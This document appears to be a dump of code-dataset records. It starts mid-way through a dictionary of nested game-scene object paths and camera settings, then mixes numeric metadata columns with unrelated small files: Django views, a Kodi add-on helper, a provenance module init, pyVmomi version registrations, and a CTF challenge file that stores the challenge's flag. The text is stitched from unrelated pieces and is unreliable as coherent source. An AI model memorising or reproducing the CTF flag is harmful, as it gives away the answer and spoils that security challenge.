'["Objects"]["1271348547.01akelts"]["Objects"]["1273017199.25akelts"]["Objects"]["1273619290.28akelts"]','1273619346.64akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273619346.64akelts"]','1273620157.05akelts': 
'["Objects"]["1271348547.01akelts"]["Objects"]["1273620157.05akelts"]','1273620315.03akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620315.03akelts"]','1273620598.95akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620598.95akelts"]','1273620603.47akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620603.47akelts"]','1273620611.52akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620611.52akelts"]','1273620618.66akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620618.66akelts"]','1273620621.63akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620621.63akelts"]','1273620626.34akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620626.34akelts"]','1273620630.56akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620630.56akelts"]','1273620634.73akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620634.73akelts"]','1273620640.63akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620640.63akelts"]','1273620656.94akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620656.94akelts"]','1273620659.98akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620659.98akelts"]','1273620665.97akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620665.97akelts"]','1273620669.09akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620669.09akelts"]','1273620672.67akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620672.67akelts"]','1273620677.44akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620677.44akelts"]','1273620682.63akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620682.63akelts"]','1273620688.64akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620688.64akelts"]','1273620692.56akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620692.56akelts"]','1273620702.75akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620702.75akelts"]','1273620705.88akelts': 
'["Objects"]["1271348547.01akelts"]["Objects"]["1273620705.88akelts"]','1273620709.64akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620709.64akelts"]','1273620713.89akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620713.89akelts"]','1273620720.83akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620720.83akelts"]','1273620724.8akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620724.8akelts"]','1273620729.81akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273180067.83akelts"]["Objects"]["1273620729.81akelts"]','1273620734.59akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620734.59akelts"]','1273620739.14akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273511541.06akelts"]["Objects"]["1273620739.14akelts"]','1273620743.03akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620743.03akelts"]','1273620751.28akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620751.28akelts"]','1273620758.86akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620758.86akelts"]','1273620762.03akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620762.03akelts"]','1273620766.06akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620766.06akelts"]','1273620772.64akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620772.64akelts"]','1273620775.31akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620775.31akelts"]','1273620777.73akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620777.73akelts"]','1273620787.44akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620787.44akelts"]','1273620791.5akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620791.5akelts"]','1273620797.59akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620797.59akelts"]','1273620801.52akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620801.52akelts"]','1273620805.95akelts': 
'["Objects"]["1271348547.01akelts"]["Objects"]["1273620805.95akelts"]','1273620829.78akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620829.78akelts"]','1273620834.02akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620834.02akelts"]','1273620838.81akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620838.81akelts"]','1273620841.69akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620841.69akelts"]','1273620847.56akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620847.56akelts"]','1273620849.91akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620849.91akelts"]','1273620856.56akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620856.56akelts"]','1273620875.95akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620875.95akelts"]','1273620880.69akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620880.69akelts"]','1273620883.53akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620883.53akelts"]','1273620888.42akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620888.42akelts"]','1273620896.14akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620896.14akelts"]','1273620901.55akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620901.55akelts"]','1273620906.09akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620906.09akelts"]','1273620910.08akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620910.08akelts"]','1273620916.48akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620916.48akelts"]','1273620923.53akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620923.53akelts"]','1273620981.88akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620981.88akelts"]','1273620989.84akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273620989.84akelts"]','1273621006.77akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273621006.77akelts"]','1273621011.42akelts': 
'["Objects"]["1271348547.01akelts"]["Objects"]["1273621011.42akelts"]','1273621016.53akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273621016.53akelts"]','1273621023.86akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273621023.86akelts"]','1273621031.13akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273621031.13akelts"]','1273622024.05akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273622024.05akelts"]','1273622024.05akelts0': '["Objects"]["1271348547.01akelts"]["Objects"]["1273622024.05akelts"]','1273622193.64akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273622193.64akelts"]','1273622246.2akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273622246.2akelts"]','1273622309.08akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273622309.08akelts"]','1273622343.75akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273622343.75akelts"]','1273622401.11akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273622401.11akelts"]','1273678010.59akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273678010.59akelts"]','1273678061.25akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273678061.25akelts"]','1273684027.48akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273622024.05akelts"]["Objects"]["1273684027.48akelts"]','1273684589.5akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273684589.5akelts"]','1273684622.66akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273684622.66akelts"]','1273684653.06akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273684653.06akelts"]','1273684715.98akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273684715.98akelts"]','1273684786.02akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273684786.02akelts"]','1273685989.81akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273686182.59akelts"]["Objects"]["1273685989.81akelts"]','1273686000.47akelts': 
'["Objects"]["1271348547.01akelts"]["Objects"]["1273686000.47akelts"]','1273686056.8akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273686056.8akelts"]','1273686095.08akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273686095.08akelts"]','1273686115.81akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273686115.81akelts"]','1273686182.59akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273686182.59akelts"]','1273686245.88akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273686245.88akelts"]','1273686376.13akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273686182.59akelts"]["Objects"]["1273686376.13akelts"]','1273686464.41akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273686464.41akelts"]','1273686476.69akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273686476.69akelts"]','1273686478.88akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273686478.88akelts"]','1273686480.44akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273686480.44akelts"]','1273686539.75akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273686539.75akelts"]','1273686561.13akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273686561.13akelts"]','1273686833.66akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273686833.66akelts"]','1273686885.94akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273686885.94akelts"]','1273686958.42akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273686958.42akelts"]','1273686958.42akelts0': '["Objects"]["1271348547.01akelts"]["Objects"]["1273686958.42akelts"]','1273687006.28akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273687006.28akelts"]','1273687006.28akelts0': '["Objects"]["1271348547.01akelts"]["Objects"]["1273687006.28akelts"]','1273687055.81akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273687055.81akelts"]','1273687099.22akelts': 
'["Objects"]["1271348547.01akelts"]["Objects"]["1273687099.22akelts"]','1273687160.83akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273687160.83akelts"]','1273687224.78akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273687224.78akelts"]','1273687265.03akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273687265.03akelts"]','1273687287.48akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273687287.48akelts"]','1273687397.27akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273687397.27akelts"]','1273687424.47akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273687424.47akelts"]','1273687605.47akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273687605.47akelts"]','1273687762.78akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273687762.78akelts"]','1273701053.88akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273701053.88akelts"]','1273702563.27akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273702563.27akelts"]','1273702749.44akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273702749.44akelts"]','1273702780.16akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273702780.16akelts"]','1273702826.28akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273702826.28akelts"]','1273702880.47akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273702880.47akelts"]','1273702880.47akelts0': '["Objects"]["1271348547.01akelts"]["Objects"]["1273702880.47akelts"]','1273702950.36akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273702950.36akelts"]','1273703038.08akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273703038.08akelts"]','1273706136.45akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273686182.59akelts"]["Objects"]["1273706136.45akelts"]','1273706558.84akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273686182.59akelts"]["Objects"]["1273706136.45akelts"]["Objects"]["1273706558.84akelts"]','1273706558.94akelts': 
'["Objects"]["1271348547.01akelts"]["Objects"]["1273686182.59akelts"]["Objects"]["1273706136.45akelts"]["Objects"]["1273706558.84akelts"]["Objects"]["1273706558.94akelts"]','1273706569.45akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273686182.59akelts"]["Objects"]["1273706136.45akelts"]["Objects"]["1273706558.84akelts"]["Objects"]["1273706558.94akelts"]["Objects"]["1273706569.48akelts"]["Objects"]["1273706569.45akelts"]','1273706569.48akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273686182.59akelts"]["Objects"]["1273706136.45akelts"]["Objects"]["1273706558.84akelts"]["Objects"]["1273706558.94akelts"]["Objects"]["1273706569.48akelts"]','1273706569.66akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273686182.59akelts"]["Objects"]["1273706136.45akelts"]["Objects"]["1273706558.84akelts"]["Objects"]["1273706558.94akelts"]["Objects"]["1273706569.48akelts"]["Objects"]["1273706569.45akelts"]["Objects"]["1273706569.66akelts"]','1273858743.94akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273858743.94akelts"]','1273858797.39akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273858797.39akelts"]','1273858797.39akelts0': '["Objects"]["1271348547.01akelts"]["Objects"]["1273858797.39akelts"]','1273858851.44akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273858851.44akelts"]','1273858987.22akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273858987.22akelts"]','1273859048.28akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273859048.28akelts"]','1273859133.81akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273859133.81akelts"]','1273859164.74akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273859164.74akelts"]','1273859174.89akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273859174.89akelts"]','1273859206.33akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273859206.33akelts"]','1274118830.34akelts': 
'["Objects"]["1271348547.01akelts"]["Objects"]["1274118830.34akelts"]','1274118881.0akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1274118881.0akelts"]','1274122002.33akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1274122002.33akelts"]','1274122131.17akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1274122131.17akelts"]','1274136366.05akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1274136366.05akelts"]','1274136840.84akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1274136840.84akelts"]','1274136872.56akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1274136872.56akelts"]','1274137485.25akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1274137485.25akelts"]','1274137802.23akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1274137802.23akelts"]','1274195453.61akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1274195453.61akelts"]','1274195538.28akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1274195538.28akelts"]','1274196102.14akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1274196102.14akelts"]','1274196159.81akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1274196159.81akelts"]','1274196236.31akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1274196236.31akelts"]','1274196276.94akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1274196276.94akelts"]','1274311689.13akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1274311689.13akelts"]','1274311689.16akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1274311689.16akelts"]','1274819841.73gcarranza': '["Objects"]["1271348547.01akelts"]["Objects"]["1274819841.73gcarranza"]','1274825376.01gcarranza': '["Objects"]["1271348547.01akelts"]["Objects"]["1274825376.01gcarranza"]','1274825967.94gcarranza': '["Objects"]["1271348547.01akelts"]["Objects"]["1274825967.94gcarranza"]','1274889994.04gcarranza': '["Objects"]["1271348547.01akelts"]["Objects"]["1274889994.04gcarranza"]','1274890958.87gcarranza': 
'["Objects"]["1271348547.01akelts"]["Objects"]["1274890958.87gcarranza"]','1274892762.3gcarranza': '["Objects"]["1271348547.01akelts"]["Objects"]["1274892762.3gcarranza"]','1274894542.99gcarranza': '["Objects"]["1271348547.01akelts"]["Objects"]["1274894542.99gcarranza"]','1274906957.35gcarranza': '["Objects"]["1271348547.01akelts"]["Objects"]["1274906957.35gcarranza"]','1274908180.63gcarranza': '["Objects"]["1271348547.01akelts"]["Objects"]["1274908180.63gcarranza"]','1274909359.61gcarranza': '["Objects"]["1271348547.01akelts"]["Objects"]["1274909359.61gcarranza"]'}}
extraInfo = {'camPos': Point3(-2.75214, 667.557, 25.8014),'camHpr': VBase3(-167.779, -8.29101, 0),'focalLength': 0.657999992371,'skyState': 2,'fog': 0,'cameraSettings': {'02': {'camPos': Point3(-20.116, 668.566, 26.6651),'camHpr': VBase3(-174.075, -16.8338, 0),'focalLength': 0.657999992371},'03': {'camPos': Point3(-20.535, 668.328, 26.1642),'camHpr': VBase3(176.439, -13.2293, 0),'focalLength': 0.657999992371},'01': {'camPos': Point3(-8.33837, 662.781, 28.5143),'camHpr': VBase3(173.506, -14.5511, 0),'focalLength': 0.657999992371},'06': {'camPos': Point3(-2.75214, 667.557, 25.8014),'camHpr': VBase3(-167.779, -8.29101, 0),'focalLength': 0.657999992371},'05': {'camPos': Point3(-3.76077, 668.398, 25.9153),'camHpr': VBase3(-167.779, -8.29101, 0),'focalLength': 0.657999992371},'3': {'camPos': Point3(-8.55837, 664.685, 26.5951),'camHpr': VBase3(176.439, -13.2293, 0),'focalLength': 0.657999992371}}}
| 63,211.666667
| 188,672
| 0.671358
| 26,823
| 189,635
| 4.656079
| 0.069232
| 0.021411
| 0.023421
| 0.021523
| 0.717015
| 0.567379
| 0.532685
| 0.501689
| 0.468284
| 0.432076
| 0
| 0.253741
| 0.049817
| 189,635
| 3
| 188,673
| 63,211.666667
| 0.439369
| 0
| 0
| 0
| 0
| 1.666667
| 0.564582
| 0.275401
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
d6d1ba393ab2c81ba3aa528da1951896eab44b3c
| 184
|
py
|
Python
|
project_name/views.py
|
the-falc0n/django-react-boilerplate
|
5fd4e72e576c03415c933e8b4aa32b2521407e68
|
[
"MIT"
] | null | null | null |
project_name/views.py
|
the-falc0n/django-react-boilerplate
|
5fd4e72e576c03415c933e8b4aa32b2521407e68
|
[
"MIT"
] | null | null | null |
project_name/views.py
|
the-falc0n/django-react-boilerplate
|
5fd4e72e576c03415c933e8b4aa32b2521407e68
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render
def homepage( request ):
return render( request, 'Home/index.html' )
def blogpage( request ):
return render( request, 'Blog/index.html' )
| 23
| 47
| 0.711957
| 23
| 184
| 5.695652
| 0.608696
| 0.198473
| 0.290076
| 0.396947
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.173913
| 184
| 7
| 48
| 26.285714
| 0.861842
| 0
| 0
| 0
| 0
| 0
| 0.163043
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0.2
| 0.4
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
d6f7535dfdd76b50e868d3c379c14e3b002caab6
| 141
|
py
|
Python
|
script.xbmcbackup/resources/lib/dropbox/pkg_resources.py
|
parser4life/tantrumrepo
|
3b37145f4772409e538cbddb0b7aa23be525772a
|
[
"Beerware"
] | 1
|
2021-05-09T19:55:51.000Z
|
2021-05-09T19:55:51.000Z
|
script.xbmcbackup/resources/lib/dropbox/pkg_resources.py
|
Reapercrew666/crypt
|
e1e0994f5323c6b454ac0f65fb2e579f7bea8e5a
|
[
"Beerware"
] | null | null | null |
script.xbmcbackup/resources/lib/dropbox/pkg_resources.py
|
Reapercrew666/crypt
|
e1e0994f5323c6b454ac0f65fb2e579f7bea8e5a
|
[
"Beerware"
] | 2
|
2020-04-01T22:11:12.000Z
|
2020-05-07T23:54:52.000Z
|
import resources.lib.utils as utils
def resource_filename(*args):
return utils.addon_dir() + "/resources/lib/dropbox/trusted-certs.crt"
| 28.2
| 73
| 0.765957
| 20
| 141
| 5.3
| 0.8
| 0.226415
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.106383
| 141
| 4
| 74
| 35.25
| 0.84127
| 0
| 0
| 0
| 0
| 0
| 0.283688
| 0.283688
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 0
| 0
|
0
| 7
|
ba30b0d5e69101600946b902428f5436af52fa9d
| 35
|
py
|
Python
|
crypto/Broadcast/secret.py
|
Enigmatrix/hats-ctf-2019
|
0dc1b9a5a4583c81b5f1b7bce0cbb9bd0fd2b192
|
[
"MIT"
] | 5
|
2019-10-04T07:20:37.000Z
|
2021-06-15T21:34:07.000Z
|
crypto/Broadcast/secret.py
|
Enigmatrix/hats-ctf-2019
|
0dc1b9a5a4583c81b5f1b7bce0cbb9bd0fd2b192
|
[
"MIT"
] | null | null | null |
crypto/Broadcast/secret.py
|
Enigmatrix/hats-ctf-2019
|
0dc1b9a5a4583c81b5f1b7bce0cbb9bd0fd2b192
|
[
"MIT"
] | null | null | null |
flag='HATS{3xp0n3n7_700_5m41l!!!}'
| 17.5
| 34
| 0.742857
| 5
| 35
| 4.8
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.294118
| 0.028571
| 35
| 1
| 35
| 35
| 0.411765
| 0
| 0
| 0
| 0
| 0
| 0.771429
| 0.771429
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ba67b095cbbd210533cf5c8f5a348640da53fb77
| 307
|
py
|
Python
|
experiments/provenance/__init__.py
|
humm/experiments
|
44770110e51349cc5e2a225322f57ede4f9fdfa7
|
[
"OML"
] | null | null | null |
experiments/provenance/__init__.py
|
humm/experiments
|
44770110e51349cc5e2a225322f57ede4f9fdfa7
|
[
"OML"
] | null | null | null |
experiments/provenance/__init__.py
|
humm/experiments
|
44770110e51349cc5e2a225322f57ede4f9fdfa7
|
[
"OML"
] | 1
|
2018-05-10T21:15:02.000Z
|
2018-05-10T21:15:02.000Z
|
from .provenance import platform_info
from .provenance import py_package_info
from .provenance import PkgDesc, PkgInfo, ProvenanceData, ProvenanceAccumulator
# from .provenance import check_dirty
# from .provenance import git_commit, git_dirty
# from .provenance import gather_provenance, check_provenance
| 38.375
| 79
| 0.846906
| 37
| 307
| 6.810811
| 0.432432
| 0.333333
| 0.47619
| 0.190476
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.107492
| 307
| 7
| 80
| 43.857143
| 0.919708
| 0.459283
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
bab7a54e3a6acfcc98bf074f945d3475b9fcb00c
| 358,811
|
py
|
Python
|
pyVmomi/_typeinfo_dp.py
|
xweichu/pyvmomi
|
77aedef02974a63517a079c482e49fd9890c09a4
|
[
"Apache-2.0"
] | null | null | null |
pyVmomi/_typeinfo_dp.py
|
xweichu/pyvmomi
|
77aedef02974a63517a079c482e49fd9890c09a4
|
[
"Apache-2.0"
] | null | null | null |
pyVmomi/_typeinfo_dp.py
|
xweichu/pyvmomi
|
77aedef02974a63517a079c482e49fd9890c09a4
|
[
"Apache-2.0"
] | null | null | null |
# ******* WARNING - AUTO GENERATED CODE - DO NOT EDIT *******
from .VmomiSupport import CreateDataType, CreateManagedType
from .VmomiSupport import CreateEnumType
from .VmomiSupport import AddVersion, AddVersionParent
from .VmomiSupport import AddBreakingChangesInfo
from .VmomiSupport import F_LINK, F_LINKABLE
from .VmomiSupport import F_OPTIONAL, F_SECRET
from .VmomiSupport import newestVersions, ltsVersions
from .VmomiSupport import dottedVersions, oldestVersions
AddVersion("vmodl.query.version.version4", "", "", 0, "vim25")
AddVersion("vmodl.query.version.version3", "", "", 0, "vim25")
AddVersion("vmodl.query.version.version2", "", "", 0, "vim25")
AddVersion("vmodl.query.version.version1", "", "", 0, "vim25")
AddVersion("vim.version.pcieHotPlugOfFPT", "vim25", "f6468705F", 0, "vim25")
AddVersion("vim.version.pr1429825", "vim25", "f0225EA5D", 0, "vim25")
AddVersion("vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "vim25", "fBA45B943", 0, "vim25")
AddVersion("dp.version.VSPHERE_DP_TELEMETRY", "dp", "f9EDDF787", 0, "dp")
AddVersion("vim.version.MemoryTiering", "vim25", "fEB88939B", 0, "vim25")
AddVersion("vim.version.v7_0_1_1", "vim25", "7.0.1.1", 0, "vim25")
AddVersion("vim.version.FCD_VRA_SUPPORT", "vim25", "f387D05F3", 0, "vim25")
AddVersion("vim.version.guestDetailedData", "vim25", "fDBF22688", 0, "vim25")
AddVersion("vim.version.SGX_MPA_VMCheck", "vim25", "f144AFCFC", 0, "vim25")
AddVersion("vim.version.vdcs", "vim25", "f2D223FDA", 0, "vim25")
AddVersion("vmodl.version.version0", "", "", 0, "vim25")
AddVersion("vim.version.NFS_VMKPORTBIND", "vim25", "f3E76F108", 0, "vim25")
AddVersion("vmodl.version.version1", "", "", 0, "vim25")
AddVersion("vmodl.version.version2", "", "", 0, "vim25")
AddVersion("dp.version.version1", "dp", "future", 0, "dp")
AddVersion("vim.version.v6_9_1", "vim25", "6.9.1", 0, "vim25")
AddVersion("vim.version.VMC_NFS_SUPPORT", "vim25", "fB9D6602F", 0, "vim25")
AddVersion("vim.version.NsxLiveUpdate", "vim25", "fB9D1B531", 0, "vim25")
AddVersion("vim.version.VDS_ReadOnlyDisk", "vim25", "fC9C35C17", 0, "vim25")
AddVersion("vim.version.v7_0_0_2", "vim25", "7.0.0.2", 0, "vim25")
AddVersion("vim.version.vVol_datastore_scalability", "vim25", "f16386A78", 0, "vim25")
AddVersion("vim.version.AssignHwCompositeDev", "vim25", "f38673F46", 0, "vim25")
AddVersion("vim.version.v6_8_7", "vim25", "6.8.7", 0, "vim25")
AddVersion("vmodl.reflect.version.version1", "reflect", "1.0", 0, "reflect")
AddVersion("vmodl.reflect.version.version2", "reflect", "2.0", 0, "reflect")
AddVersion("vim.version.v8_0_0_0", "vim25", "8.0.0.0", 0, "vim25")
AddVersion("vim.version.VQAT", "vim25", "f39AC0073", 0, "vim25")
AddVersion("vim.version.VCDP_NestedFilters", "vim25", "f6B273B70", 0, "vim25")
AddVersion("vim.version.nativeSnapshot", "vim25", "f627CD25E", 0, "vim25")
AddVersion("vim.version.hostProfiles", "vim25", "f19A23BEB", 0, "vim25")
AddVersion("vim.version.GraphicsDRS", "vim25", "fFF21E076", 0, "vim25")
AddVersion("vim.version.v7_0_3_1", "vim25", "7.0.3.1", 0, "vim25")
AddVersion("vim.version.v7_0_3_2", "vim25", "7.0.3.2", 0, "vim25")
AddVersion("vim.version.v7_0_3_0", "vim25", "7.0.3.0", 0, "vim25")
AddVersion("vim.version.hwh", "vim25", "f55E01367", 0, "vim25")
AddVersion("vim.version.version13", "vim25", "6.7.1", 0, "vim25")
AddVersion("vim.version.version14", "vim25", "6.7.2", 0, "vim25")
AddVersion("vim.version.version15", "vim25", "6.7.3", 0, "vim25")
AddVersion("dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", "dp", "f6F7CDE54", 0, "dp")
AddVersion("vim.version.VSAN2_Configure", "vim25", "fB91B17FA", 0, "vim25")
AddVersion("vim.version.DRS_LB_REASONCODE", "vim25", "f0DCF3EE9", 0, "vim25")
AddVersion("vim.version.gosCrashRemediation", "vim25", "f41CA5C7B", 0, "vim25")
AddVersion("vim.version.VCSOF_173", "vim25", "fBAEF7A12", 0, "vim25")
AddVersion("vim.version.pciSriovExtendedID", "vim25", "fDC5D7D0B", 0, "vim25")
